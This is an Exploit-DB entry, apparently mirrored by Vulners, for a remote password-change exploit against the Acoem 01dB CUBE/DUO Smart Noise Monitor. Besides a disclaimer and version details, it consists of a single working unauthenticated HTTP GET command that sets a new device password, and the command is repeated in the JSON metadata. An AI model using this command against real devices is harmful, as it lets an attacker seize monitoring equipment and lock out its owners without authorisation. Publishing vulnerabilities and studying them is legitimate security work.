Search...

Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change

2016-11-07T00:00:00

ID EDB-ID:40720
Type exploitdb
Reporter Todor Donev
Modified 2016-11-07T00:00:00

Description

Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change. Remote exploit for Hardware platform

                                        
                                            #!/bin/sh
# 
#  Acoem 01dB CUBE Smart Noise Monitoring Terminal
#  Remote Password Change
#  
#  HW version:       LIS001A
#  Application FW:   2.34
#  Metrology FW:     2.10
#  Modem FW:         12.00.005 / 08.01.108
# 
#
#  Copyright 2016 (c) Todor Donev 
#  &lt;todor.donev at gmail.com&gt;
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

[todor@adamantium ~]$ GET "http://&lt;TARGET&gt;/ajax/F_validPassword.asp?NewPwd=&lt;PASSWORD&gt;"

JSON Vulners Source

Initial Source

{"id": "EDB-ID:40720", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change", "description": "Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change. Remote exploit for Hardware platform", "published": "2016-11-07T00:00:00", "modified": "2016-11-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/40720/", "reporter": "Todor Donev", "references": [], "cvelist": [], "lastseen": "2016-11-07T21:29:54", "viewCount": 4, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-07T21:29:54", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-07T21:29:54", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/40720/", "sourceData": "#!/bin/sh\r\n# \r\n# Acoem 01dB CUBE Smart Noise Monitoring Terminal\r\n# Remote Password Change\r\n# \r\n# HW version: LIS001A\r\n# Application FW: 2.34\r\n# Metrology FW: 2.10\r\n# Modem FW: 12.00.005 / 08.01.108\r\n# \r\n#\r\n# Copyright 2016 (c) Todor Donev \r\n# <todor.donev at gmail.com>\r\n# https://www.ethical-hacker.org/\r\n# https://www.facebook.com/ethicalhackerorg\r\n#\r\n# Disclaimer:\r\n# This or previous programs is for Educational \r\n# purpose ONLY. Do not use it without permission. \r\n# The usual disclaimer applies, especially the \r\n# fact that Todor Donev is not liable for any \r\n# damages caused by direct or indirect use of the \r\n# information or functionality provided by these \r\n# programs. The author or any Internet provider \r\n# bears NO responsibility for content or misuse \r\n# of these programs or any derivatives thereof.\r\n# By using these programs you accept the fact \r\n# that any damage (dataloss, system crash, \r\n# system compromise, etc.) caused by the use \r\n# of these programs is not Todor Donev's \r\n# responsibility.\r\n# \r\n# Use them at your own risk!\r\n#\r\n# Thanks to Maya Hristova that support me. \r\n\r\n[todor@adamantium ~]$ GET \"http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>\"\r\n", "osvdbidlist": []}